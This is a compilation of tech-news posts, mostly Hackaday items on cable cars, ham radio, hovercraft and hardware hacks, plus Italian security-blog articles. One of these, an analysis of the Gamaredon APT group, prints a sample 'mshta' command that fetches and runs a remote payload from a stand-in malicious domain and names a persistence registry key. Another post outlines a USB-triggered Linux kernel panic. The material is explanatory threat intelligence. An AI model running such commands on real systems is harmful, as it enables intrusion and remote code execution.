The cable car system of San Francisco is the last manually operated cable car system in the world, with three of the original twenty-three lines still operating today. With these systems being installed between 1873 and 1890, they were due major maintenance and upgrades by the time the 1980s and with it their 100th year of operation rolled around. This rebuilding and upgrading process was recorded in a documentary by a local SF television station, which makes for some fascinating viewing.
San Francisco cable car making its way through traffic. Early 20th century.
While the cars themselves were fairly straight-forward to restore, and the original grips that’d latch onto the cable didn’t need any changes. But there were upgrades to the lubrication used (originally pine tar), and the powerhouse (the ‘barn’) was completely gutted and rebuilt.

As opposed to a funicular system where the cars are permanently attached to the cable, a cable car system features a constantly moving cable that the cars can grip onto at will, with most of the wear and tear on the grip dies. Despite researchers at San Francisco State University (SFSU) investigating alternatives, the original metal grip dies were left in place, despite their 4-day replacement schedule.

Ultimately, the rails and related guides were all ripped out and replaced with new ones, with the rails thermite-welded in place, and the cars largely rebuilt from scratch. Although new technologies were used where available, the goal was to keep the look as close as possible to what it looked at the dawn of the 20th century. While more expensive than demolishing and scrapping the original buildings and rolling stock, this helped to keep the look that has made it a historical symbol when the upgraded system rolled back into action on June 21, 1984.

Decades later, this rebuilt cable car system is still running as smoothly as ever, thanks to these efforts. Although SF’s cable car system is reportedly mostly used by tourists, the technology has seen somewhat of a resurgence. Amidst a number of funicular systems, a true new cable car system can be found in the form of e.g. the MiniMetro system which fills the automated people mover niche.

youtube.com/embed/56QWZwLMCsA?…

Thanks to [JRD] for the tip.

hackaday.com/2024/12/11/retrot…

This week, Jonathan Bennett, Simon Phipps, and Aaron Newcomb chat about retrocomputing, Open Source AI, and … politics? How did that combination of topics come about? Watch to find out!

youtube.com/embed/RDRR4ti-zdQ?…

Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2024/12/11/floss-…

Have you ever considered running your ham radio remotely? It has been feasible for years but not always easy. Recently, I realized that most of the pieces you need to get on the air remotely are commonplace, so I decided to take the plunge. I won’t give step-by-step instructions because your radio, computer setup, and goals are probably different from mine. But I will give you a general outline of what you can do.

I’m fortunate enough to have a sizeable freestanding shop in my backyard. When I had it built, I thought it was huge. Now, not so much. The little space is crammed with test equipment, soldering gear, laser cutters, drill presses, and 3D printers. I’ve been a ham for decades, but I didn’t have room for the radios, nor did I have an antenna up. But a few months ago, I made space, set some radios up, strung out a piece of wire, and got back on the air. I had so much fun I decided it was time to buy a new radio. But I didn’t want to have to go out to the shop (or the lab, as I like to call it) just to relax with some radio time.

Good News!

The good news is that this makes life easier for going remote. The lab has a good network connection back to the house and I don’t have to worry about my radio being open to the public Internet. I also don’t have to worry about the transmitter going rogue since, if it does, I can simply walk out the back door and turn it off.

On the other hand, you could probably operate the station from anywhere in the world you have a network connection. You can VPN back into the local network. I have the transmitter on a switch so Alexa or Google can turn it on and off. The radio and all the software have safeguards such as maximum transmit time timeouts and a feature to shut down transmitting if it loses a network connection. So, if you are brave enough and your local laws permit it, you could probably operate from anywhere.

One Way

Nowadays, having a computer connected to your radio is almost a requirement. Even my old radio could take commands over an RS232 port. The new rig, an Icom IC-7300, has a USB port, and it looks like both a serial port and a sound card.

That last bit is especially handy since you used to have to figure out how to cable between the rig and the computer’s sound card. Now the rig is the computer’s sound card — or, at least, one of them.

Why?

If you are a ham, you can probably skip ahead, but if you aren’t, you might wonder why you need a computer. Of course, some of it is just handy. You can keep your log and look up propagation or callsigns. But you don’t have to be connected to a radio to do that. It just makes it easier.

There are two reasons having the computer connected to the radio really pays off. First, you can send and receive digital signals using a sound card.

Digital signals include text like RTTY or PSK31 where you type messages to each other, pictures in the form of SSTV, or computer-to-computer modes like FT8. Some people experiment with digital voice modes. There are many other options.

The other thing a computer can do is control your radio. Sure, you can use the knobs and buttons, but a computer can control it, which, for remote access, is essential. It can also help when you want a program to, for example, look up a station you’ve heard, find its location, calculate the direction that station is relative to you, and move your antenna to point in that direction.

How?

The simplest way to create a remote station is just to use a remote desktop program to log into the computer at your station. For digital modes, that may even be the best way, but it means all the software runs on the station computer (which could be a Raspberry Pi, for example). It also means that the audio you want to hear or send has to traverse over the remote desktop software, and most of them will prioritize screen traffic over audio. Plus if either computer has an unusually large or small screen, it isn’t always a good experience.

While I’ve played with that, I elected to go a different way. I wanted the radio and computer to be more or less a terminal and run the software to do things on my computer back in the office or my laptop.

To do this, you need two things: a way to control the radio and a way to send and receive audio as though you were on the station PC.

Control

Rig control is the trickiest part because it depends on what radio you have. Many radio manufacturers supply their own software, but often community offerings are better. In my case, I used the wfview software which works will with Icom radios. However, there are many other options for both Icom and other radios.

I picked it because it knows how to speak remotely to another instance of itself and can expose a standard “hamlib” interface that many pieces of ham software use to control radios.
The basic setup for FT8

FT-8 and Audio

The audio setup is a bit trickier. If all you want to do is listen and talk, then wfview does fine all by itself. However, my goal was to be able to install software for FT8, PSK31, RTTY, and even digital voice. In this case, I’m using JTDX for FT8.

JTDX can control a radio over a hamlib network connection. That isn’t turned on in wfview by default, but it is easy to turn on and assign a port number. In theory, you could do this on the remote copy of wfview or the local copy, but I chose to do it on the local copy. That means JTDX talks to the radio on the local 127.0.0.1 IP address.

For the audio, I needed a way to pipe audio from the fake sound card provided by wfview to the input of JTDX. Luckily, I just wrote a Linux Fu post about that very topic. If you don’t mind rebuilding everything, you can make a single audio loopback, but I made two: one for the radio input and one for the radio output.
The PipeWire configuration for FT8
By using two that I create on system startup (for example, in the /etc/rc.local file or using systemd), the programs always have a “device” that they can connect to. Just don’t forget the loopback have to run under your user ID, not root. If you rely on plain PipeWire or PulseAudio to make the connections, you will have to rebuild the connections each time.

Note that radio-in and radio-out are always available (assuming you created them). So when the programs start up, they can find the pipe even if the other side of the pipe doesn’t exist yet. That makes it easy to keep everything connected. Instead of branching the radio output to the speakers, the monitor output of the pipe does the job.

Creating these loopback devices is simple:
pw-loopback -n radio-in -m '[FL FR]' --capture-props='media.class=Audio/Sink' --playback-props='media.class=Audio/Source'
pw-loopback -n radio-out -m '[FL FR]' --capture-props='media.class=Audio/Sink' --playback-props='media.class=Audio/Source'
If you want to know more, check out my earlier post on PipeWire.

If you use Windows, there are ways to do it there, too (including if you are running Linux on one side and Windows on the other). The wfview audio configuration page has some details. While they suggest VBAN for Windows, you can use it with Linux, too, although even if you have a mixed setup, you can always use the native Linux facilities.

On the Air

Does it work? It sure does, as you can see in the accompanying screenshot. The latency of the audio over the network is usually under 200 milliseconds, so that’s workable, although if you have a lot of delay, it might present a problem. I tried a VPN connection from a remote location, but I still had less than 400 milliseconds. For some reason, over a long period of time, the latency creeps up even on a local network, but restarting wfview seems to fix it.
Operating FT8 remotely
Since you won’t have my exact setup, I won’t go through the configuration, but clearly you’ll have to work out the connections for audio to each program. You may also experiment with different codecs — it will depend on your software.

Setting up a remote station isn’t nearly as hard as it used to be. Modern radios are easy to control over a network — some even have network jacks. Your home network is probably up to the task of shipping audio around, and there are solutions for piping audio between programs for Linux, Windows, or even both.

Keep in mind that while I did this with FT8, it works with voice or just about any other digital mode. You can even do CW, but — as far as I know — wfview won’t let you use a key. You’ll have to type your Morse code in. If you need a primer on FT8, we got you. If you prefer your remote control in the browser, this might help you.

hackaday.com/2024/12/11/its-re…

At the time of its construction in the 1950s, the Dwingeloo Radio Observatory was the largest rotatable telescope in the world with a dish diameter of 25 meters. It was quickly overtaken in the rankings but was used by astronomers for decades until it slowly fell into disuse in the early 2000s. After a restoration project the telescope is now a national heritage site in the Netherlands where it is also available for use by radio amateurs. Recently this group was able to receive signals from Voyager 1.

Famously, Voyager 1 is the furthest manmade object from Earth, having been launched on a trajectory out of the solar system in 1977. As a result of distance and age, the signals it sends out are incredibly faint. The team first had to mount a new antenna to the dish, which was not originally designed for signals in this frequency which added to the challenge. They then needed to use orbital predictions of the spacecraft in order to target the telescope and also make the correct adjustments to the received signal given that there is significant Doppler shift now as well. But with that all out of the way, the team was successfully able to receive the Voyager 1 signal on this telescope.

Only a few telescopes in the world have ever been able to accomplish this feat, making it all the more impressive. Normally Voyager 1 is received using the Deep Space Network, a fleet of much larger dishes stationed around the world and designed for these frequencies. But this team is used to taking on unique challenges. They also decoded the first ham radio station on the moon and made a radar image of the moon using LoRa.

Dwingeloo telescope receives signals from Voyager 1

camras.nl/en/blog/2024/dwingel…

hackaday.com/2024/12/11/amateu…

In the world of transportation, some technologies may seem to make everything else appear obsolete, whether it concerns airplanes, magnetic levitation or propelling vehicles and craft over a cushion of air. This too seemed to be the case with hovercraft when they exploded onto the scene in the 1950s and 1960s, seemingly providing the ideal solution for both commercial and military applications. Freed from the hindrances of needing a solid surface to travel upon, or a deep enough body of water to rest in, hovercraft gave all the impressions of combining the advantages of aircraft, ships and wheeled vehicles.

Yet even though for decades massive passenger and car-carrying hovercraft roared across busy waterways like the Channel between England & mainland Europe, they would quietly vanish again, along with their main competition in the form of super fast passenger catamarans. Along the English Channel the construction of the Channel Tunnel was a major factor here, along with economical considerations that meant a return to conventional ferries. Yet even though one might think that the age of hovercraft has ended before it ever truly began, the truth may be that hovercraft merely had to find its right niches after a boisterous youth.

An example of this can be found in a recent BBC article, which covers the British Griffon Hoverwork company, which notes more interest in new hovercraft than ever, as well as the continued military interest, and from rescue workers.

Why Hovercraft Were Terrible

Although we often think of hovercraft as something like something modern, they have been something that people have been tinkering around with for hundreds of years, much like airplanes, maglev and so on. These were all rather small-scale, however, and it took until the 20th century for some of the fundamentals got worked out. The addition of the flexible skirt to contain the air in a so-called momentum curtain to raise the hovercraft further off the ground and add robustness when traveling over less gentle terrain proved fundamental, and within a few decades passenger behemoths were making their way across the English Channel, gently carried on cushions of air:

youtube.com/embed/Y8I3aK5A13U?…

Yet not all was well. As can be ascertained by the above video, the noise levels were very high, and so was the fuel usage for these large hovercraft. The skirts ended up wearing down much faster than expected, resulting in a need for daily maintenance and replacement of skirt sections. By the 1990s catamaran ferries offered a similar experience as the clunky SR-N4s, while requiring much less maintenance. When the Channel Tunnel opened in 1994, the writing was on the wall for Britain’s passenger hovercraft.
Aérotrain I-80 upon delivery in 1969 (Source: Archives Association des Amis de Jean Bertin, Wikimedia)
Years before, the high fuel usage and a range of other issues had already ended the dream of hovertrains. These would have done much the same as maglev trains, only without the expensive tracks. Unfortunately these hovertrains uncovered another issue with the air cushion concept. Especially at higher velocities the loss of air from this cushion would increase significantly, while using the environmental air to keep the cushion on pressure becomes harder, not unlike with the air intakes of airplanes.

Ultimately these issues caught up, with the hovertrain’s swansong occurring in the 1970s with the Aérotrain I-80 and UTACV already. The world’s largest commercial hovercraft – the SR.N4 – made its final trip in 2000 when its operator coasted on for a few more years with its catamaran ferries before closing up shop. These days the only way you can see these artefacts from the Age of Hover is in museums, with the GH-2007 Princess Anne SR.N4 as the last remaining example of its kind at the Hovercraft Museum in Lee-on-the-Solent in Hampshire.

Recently the Tim Traveller YouTube channel went over to this museum to have a gander:

youtube.com/embed/x5jmrW1HvMQ?…

Why Hovercraft Are Great

Baien at the Port of Oita, 2023 (Credit: Pinkaba, Wikimedia, CC BY-SA 4.0)
So with that said, obviously hovercraft and its kin were all investigated, prodded & poked and found to be clearly wanting by the 1990s, before the whole idea was binned as clearly daft and bereft of reason. While this might be true for massive passenger hovercraft and hovertrains, the reality for other niches is far less bleak. Especially with the shift from the old-school, inefficient engines to modern-day engines, and more of a need for smaller craft.

Currently passenger hovercraft services are quite limited, with the Japanese city of Oita having a hovercraft service between the city center and the airport. Here hovercraft make sense as they are over twice as fast on the 33 kilometer route as the bus service. These hovercraft are built by British hovercraft company Griffon Hoverwork Ltd., as currently the only company building such craft in the world. Similarly, the Isle of Wight’s Hovertravel is a hovercraft passenger service between the island and the mainland, with two Griffon 12000TD hovercraft providing the fastest possible way for people (including many tourists) to travel. Hovertravel’s services are also chartered on occasion with events.

For these tourism-oriented applications the benefits of hovercraft are clear: they are the fastest way to travel especially across water (74 km/h for the 12000TD) and are rather flexible so that they can be used ad-hoc with events that do not have more than a patch of concrete or grass bordering the water. Noise levels with modern engines and with smaller craft are also significantly more manageable.

As addressed in the earlier referenced BBC article, there are three other niches where hovercraft have found a warm home. These include hobbyists who enjoy racing with small hovercraft, as well as rescuers who benefit from having a way to reach people no matter whether they’re stuck on a frozen pond, in a muddy area, in the middle of a swamp or somewhere else that’s hostile to any wheeled or tracked vehicle, never mind rescuers trying to reach someone by foot. Here the property of a hovercraft of not caring much about what exactly its air cushion is pushing against is incomparable and saves many lives.

To Land Where Nobody Has Landed Before

LCAC-55, a Navy Landing Craft Air Cushion (LCAC), maneuvers to enter the well deck of the amphibious assault ship USS Kearsarge (LHD-3). (Credit: US Navy)
Naturally, the other niche where a hovercraft’s disregard for things like mud, wet sand and rocks is useful is when you are a (military) force trying to carry lots of people, gear and heavy equipment onshore, without such minor details like finding a friendly harbor getting in the way. Although the US Navy and Army had tried to use hovercraft in a more direct role before, such as the unsuccessful SR.N5-derived PACV in Vietnam, their best role was found to be as landing craft: the Landing Craft Air Cushion, or LCAC.

A total of 97 have been built of these LCACs since their introduction in 1986 and they see continuous use as transport of cargo and personnel from ship to shore, across beaches and so on. Due to increasing (weight) demands they are now slated to be replaced by the Ship-to-Shore Connector (SSC). These are very similar to the LCACs, but offer more capacity (~20 ton more), while offering improvements to the engines, the skirt design and a two-person cockpit with fly-by-wire joystick controls.

Similarly, the Chinese Navy (PLAN) also has an LCAC in service (the Jinsha II-class type 726), and both Russia and Hellenic Navy operate formerly Soviet Zubr-class LCACs, which is the largest currently active hovercraft. A few more Zubrs were constructed by Ukraine for both Greece and China, with the latter also building them under license as the Type 958 LCAC.

Happy Niche

Because physics and economics are relentless, hovercraft, maglev and catamarans never made us bid farewell to wheels, tracks, hulls and simple train tracks, but each of these have found their own happy niches to live in. Meanwhile economics change and so does our understanding of materials, propulsion methods and other factors that are relevant to these technologies as they compete with transportation methods that have been a part of human history for much longer already.

For now at least hovercraft seem to have found a couple of niches where their properties provide benefits that are unmatched, whether it’s in simply being the fastest way to move over water, mud and concrete all in one trip, or for the most fun to be had while racing over such a track, or for providing life-saving aid, or to carry heavy loads from ship-to-shore when said shore is muddy marshes, a beach or similar.

Even if we will never see the likes of the Princess Anne again crossing the Channel, the hovercraft is definitely here to stay.

Featured image: Photo of the Solent Flyer hovercraft operated by Hovertravel approaching Ryde (Credit: Geni, Wikimedia)

hackaday.com/2024/12/11/the-ho…

Reverse engineering a payphone doesn’t sound like a very interesting project, at least in the United States, where payphones were little more than ruggedized versions of residential phones with a coin mechanism attached. Phones in other parts of the world were far more interesting, though, as this look at the mysteries of a payphone from Israel reveals (in Hebrew; English translation here.)

This is a project [Inbar Raz] worked on quite a while ago, but only got around to writing up recently. The payphone in question was sourced from the usual surplus market channels, and appears to have been removed from service by Israeli telecommunications company Bezeq only shortly before he found it. It was in pretty good shape, and was even still locked tight, making some amateur locksmithing the first order of the day. The internals of the phone are surprisingly complex, with a motherboard that looks more like something from a PC. Date codes on the chips and through-hole construction date the device to the early- to mid-1990s.

With physical access gained, [Inbar] turned to the firmware. An Atmel flash chip seemed a good place to look, and indeed he was able to pull code off the chip. That’s where things took a turn thanks to the CPU the code was written for — the CDP1806, a later version of the more popular but still fringe CDP1802. This required [Inbar] to fall down the rabbit hole of writing a new processor definition file for Ghidra so that the firmware could be reverse-engineered. This got him to the point of understanding 1806 assembly well enough that he was able to re-flash the phone to print debugging messages on the built-in 16×2 LCD screen, which allowed him to figure out which routines were being called under various error conditions.

It doesn’t appear that [Inbar] ever completed the reverse engineering project, but as he points out, what does that even mean? He got inside, took a look around, and made the phone do some cool things it couldn’t do before, and in the process made things easier for anyone working with 1806 processors in Ghidra. That’s a pretty complete win in our books.

hackaday.com/2024/12/11/unexpe…

Although there might have been other music produced or recorded in the 1980s, we may never know of its existence due to the cacophony of all of the various keytars, drum machines, and other synthesized music playing nonstop throughout the decade. There was perhaps no more responsible synthesizer than the Yamaha DX7 either; it nearly single-handedly ushered in the synth pop era. There had been other ways of producing similar sounds before but none were as unique as this keyboard, and for ways beyond just its sound as [Kevin] describes in this write-up.

Part of the reason the DX7 was so revolutionary was that it was among the first accessible synthesizers that was fully digital, meaning could play more than one note at a time since expensive analog circuitry didn’t need to be replicated for multiple keys. But it also generated its tones by using frequency modulation of sine waves in a way that allowed many signals to be combined to form different sounds. While most popular musicians of the 80s used one of the preset sounds of the synthesizer, it could produce an incredible range of diverse sounds if the musician was willing to dig a bit into the programming of this unique instrument.

There were of course other reasons this synthesizer took off. It was incredibly robust, allowing a musician to reliably carry it from show to show without much worry, and it also stood on the shoulders of giants since musicians had been experimenting with various other types of synthesizers for the previous few decades. And perhaps it was at the right place and time for the culture as well. For a look at the goings on inside the chip that powered the device, [Ken Shirriff] did a deep dive into one a few years ago.

hackaday.com/2024/12/11/the-ma…

Europol denuncia l’arresto di otto membri di un gruppo internazionale di criminalità informatica che ha rubato milioni di euro alle sue vittime. Gli indagati hanno affittato immobili e appartamenti di lusso tramite Airbnb e vi hanno creato call center fraudolenti.

I membri del gruppo sono stati arrestati in Belgio e nei Paesi Bassi all’inizio di dicembre 2024. È stato inoltre riferito che contemporaneamente in due paesi sono state effettuate 17 perquisizioni, durante le quali la polizia ha sequestrato supporti di memorizzazione, telefoni e vari oggetti di lusso, che presumibilmente sarebbero stati acquistati con i proventi di crimini informatici.

La polizia olandese riferisce dell’arresto di tre uomini e una donna, di età compresa tra 23 e 66 anni. I sospettati sono accusati di phishing, frode online, frode bancaria, riciclaggio di denaro e coinvolgimento in attività criminali informatiche.

Secondo le forze dell’ordine, il gruppo ha condotto le sue campagne di phishing da call center temporanei che i truffatori hanno allestito in appartamenti di lusso affittati tramite Airbnb.

I truffatori hanno contattato le vittime dei paesi europei tramite e-mail, SMS o messaggi WhatsApp e si sono spacciati per impiegati di banca o funzionari delle forze dell’ordine che presumibilmente lavorano per combattere le frodi. Hanno scritto e chiamato le vittime, sostenendo che i loro conti erano stati compromessi e invitando le persone a cliccare rapidamente sui collegamenti ai siti di phishing che imitavano le banche reali.

Se un utente si innamorava dei truffatori (e il bersaglio degli aggressori erano spesso persone anziane) e immetteva i propri dati personali su queste pagine dannose, queste finivano nelle mani degli aggressori, che svuotavano rapidamente gli account della vittima.

Allo stesso tempo, secondo gli investigatori, gli aggressori hanno speso i fondi rubati in un modo molto insolito: acquistando viaggi costosi, abiti firmati, orologi premium, auto di lusso e organizzando feste in club chiusi.

Le forze dell’ordine hanno botato che i sospettati non hanno nemmeno cercato di nascondersi e hanno apertamente dimostrato uno stile di vita lussuoso sui social network, pubblicando regolarmente immagini di beni costosi e foto con celebrità.

L'articolo Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi proviene da il blog della sicurezza informatica.

Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.

Tecniche di Attacco e Vettori di Infezione

La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.

L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.

1. File LNK Maligni

APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.

Esempio di Comando LNK:
mshta http://malicious-domain/payload.hta

2. File XHTML Malevoli

Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.

Tecnica di Download Dinamico:

3. Campagne di Spear-Phishing

APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.

Strumenti e Malware Impiegati

1. Pteranodon

Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.

Funzionalità principali:

• Esecuzione di comandi remoti
• Esfiltrazione di file sensibili
• Persistenza tramite chiavi di registro

2. LitterDrifter

Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.

Meccanismo di Diffusione:

• Copia del file VBS nelle unità rimovibili
• Creazione di file LNK dannosi nella root dell’unità USB
• Esecuzione automatica tramite modifiche al file autorun.inf

3. GammaLoad e GammaSteel

Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.

Tecniche di Persistenza e Obfuscation

APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:

1. Modifiche al Registro di Sistema:
   
   • Esecuzione automatica dei payload malevoli tramite chiavi di registro:
   • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

   
   

2. Obfuscation degli Script:
   
   • Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.

   
   

3. Infettare Dispositivi Rimovibili:
   
   • Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.

   
   

Infrastruttura di Comando e Controllo (C2)

L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:

• Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
• Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.

Esempio di IP associato: 5.181.189.32

Settori Colpiti

I settori principali presi di mira da APT-C-53 includono:

• Governo
• Difesa
• Diplomazia
• Media
• Attivisti e ONG

APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:

• Filtri avanzati per email e allegati
• Monitoraggio delle modifiche al registro di sistema
• Segmentazione della rete e restrizioni sui dispositivi USB
• Aggiornamenti costanti dei sistemi di rilevamento delle minacce

Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.

L'articolo APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio proviene da il blog della sicurezza informatica.

L’AI General Guidance Test (AGI), sviluppato nel 2019 da Francois Chollet, ha portato a importanti scoperte sui limiti della tecnologia. Gli autori del test affermano che i risultati sono più una prova di carenze che una vera svolta nel campo della ricerca AGI.

Il test ARC-AGI (Abstract and Reasoning Corpus for Artificial General Intelligence) è stato progettato come strumento per valutare la capacità dell’IA di apprendere nuove competenze oltre i dati di addestramento.

Fino al 2024, i migliori modelli di intelligenza artificiale potrebbero risolvere meno di un terzo dei problemi ARC-AGI. Chollet ha criticato l’attenzione dell’industria sui modelli linguistici di grandi dimensioni (LLM), ritenendo che fossero incapaci di un vero “ragionamento”. Secondo Chollet, gli LLM si basano esclusivamente sulla memorizzazione, il che li rende vulnerabili alle sfide che vanno oltre il set di dati di formazione.

Per stimolare la ricerca oltre il LLM, Chollet, insieme a Mike Knoop, co-fondatore di Zapier, ha lanciato un concorso da 1 milione di dollari nel giugno 2024 per creare un sistema di intelligenza artificiale aperto in grado di battere ARC-AGI. Il miglior risultato della competizione è stato del 55,5%, quasi il 20% in più rispetto al record precedente, ma ancora lontano dalla soglia dell’85%, considerata il “livello umano” e necessario per vincere.

Come ha osservato Knoop nel blog, tali risultati non indicano progressi significativi verso la creazione dell’AGI. Molti partecipanti al concorso hanno utilizzato un approccio di forza bruta per trovare soluzioni, il che mette in discussione il valore dei compiti dell’ARC-AGI per la valutazione dell’intelligenza generale.

ARC-AGI prevede compiti in cui l’IA deve generare risposte corrette sotto forma di griglie composte da quadrati di diversi colori. I compiti sono volti a testare la capacità di adattamento a nuovi problemi. Tuttavia, l’efficacia di questo approccio ha sollevato dubbi.
Griglia di output della risposta ARC-AGI ( arcprize.org )
Gli ideatori del test ne riconoscono le imperfezioni. Secondo Knoop, il test è rimasto invariato sin dal suo inizio e le critiche nei suoi confronti come strumento per ottenere l’AGI non hanno fatto altro che aumentare.

Il concetto stesso di AGI è ulteriormente controverso: alcuni esperti ritengono che l’AGI sia già stata raggiunta se interpretata come la capacità dell’IA di sovraperformare gli esseri umani nella maggior parte dei compiti.

Gli esperti prevedono di presentare la seconda versione del test ARC-AGI nel 2025, il cui obiettivo principale è indirizzare gli sforzi della comunità di ricerca per risolvere problemi chiave nel campo dell’IA e accelerare l’approccio all’AGI.

L'articolo L’AGI è ancora lontano? Ecco il test ARC-AGI che mette in palio Un Milione di Dollari proviene da il blog della sicurezza informatica.

The extended filesystem, otherwise known as ext, has been a fundamental part of Linux since before the 1.0 release in 1994. Currently the filesystem is on its fourth major revision, in use since its release in 2008 thanks to its stability, reliability, and backwards compatibility with the other ext filesystem versions. But with that much history there are bound to be a few issues cropping up here and there. [Will] recently found an exploit with this filesystem that can cause a Linux kernel to immediately panic when a manipulated USB drive is inserted into a computer.

[Will] discovered this quirk when investigating the intricacies of the filesystem for problems and other vulnerabilities. A tool called tune2fs, used for administering and modifying ext filesystems, includes the ability to pass certain commands to the Linux kernel when certain situations arise with the filesystem itself, including that the kernel should panic. One situation is that the ext filesystem itself becomes corrupted, which can then cause the kernel panic. Armed with this knowledge, a USB drive can be purposefully given a corrupted ext filesystem which, when plugged into a Linux machine, can cause the computer to shut down.

The post linked above goes into some discussion about how this exploit could be used maliciously to gain access to a Linux system, including rebooting computers where no access to a power button is otherwise enabled or making other changes to the system before needing a reboot to apply the changes. In general, though, it’s good to assume an attacker could take any route to gain access to a machine. This exploit from a few years ago, for example, allowed another Linux tool to be used to gain root access.

Thanks to [Timothy] for the tip!

hackaday.com/2024/12/10/a-pote…

chort ↙️↙️↙️

2024-12-10 00:54:46

@glitzersachen if you have the ability to supply external boot media, but cannot access the power button (kiosk perhaps?)

Another example: Many years ago I found a security "appliance" that allowed passwordless database login by root, with a limited set of privileges. Interestingly, the privileges allowed creating new privileges, but did not allow applying the privileges. However, the new privileges would be applied when the DB restarted. So I combine that with an existing Linux kernel unauthenticated remote DoS that would reboot the machine.

I'm sure people way smarter than me could figure out ways to leverage this.

When we look at how everyone’s favorite flying dinosaurs get around, we can see that although they use their wings a lot too, their legs are at least as important. Even waddling or hopping about somewhat ungainly on legs is more energy efficient than short flights, and taking off from the ground is helped by jumping into the air with a powerful leap from one’s legs. Based on this reasoning, a team of researchers set out to give flying drones their own bird-inspired legs, with their findings published in Nature (preprint on ArXiv).

The prototype RAVEN (Robotic Avian-inspired Vehicle for multiple ENvironments) drone is capable of hopping, walking, jumping onto an obstacle and jumping for take-off. This allows the drone to get into the optimal position for take-off and store energy in its legs to give it a boost when it takes to the skies. As it turned out, having passive & flexible toes here was essential for stability when waddling around, while jumping tests showed that the RAVEN’s legs provided well over 90% of the required take-off speed.

During take-off experiments the drone was able to jump to an altitude of about 0.4 meters, which allows it to clear ground-based obstacles and makes any kind of ‘runway’ unnecessary. Much like with our avian dinosaur friends the laws of physics dictate that there are strong scaling limits, which is why a raven can use this technique, but a swan or similar still requires a bit of runway instead of jumping elegantly into the air for near-vertical take-off. For smaller flying drones this approach would however absolutely seem to have legs.

youtube.com/embed/-8DJ1a3sLIc?…

hackaday.com/2024/12/10/flying…

Il cybercrime rappresenta un universo in costante espansione, capace di attirare non solo l’interesse di singoli hacker esperti di informatica, ma anche di criminali tradizionali e organizzazioni ben strutturate, con obiettivi complessi e su larga scala.

L’espansione del Dark Web, con i suoi forum, chat e mercati anonimi e illegali, ha permesso di interconnettere i cybercriminali tra loro, facilitando la comunicazione e abbattendo le barriere geografiche tipiche del crimine tradizionale. Questo ha portato a un aumento dei fenomeni illeciti, come la condivisione di informazioni riservate, account personali o aziendali e database di vario tipo. Tra le attività più rilevanti in questo underground tecnologico si distingue il narcotraffico, che ha trovato nuovi spazi per espandersi e superare i confini territoriali. Inoltre, si è registrato un costante aumento di truffe (SCAM), accompagnato da un incremento del traffico di esseri umani e della diffusione di materiale pedopornografico.

Scarica il report “Dal Cybercrime al Cyber Organized Crime (COC) di DarkLab

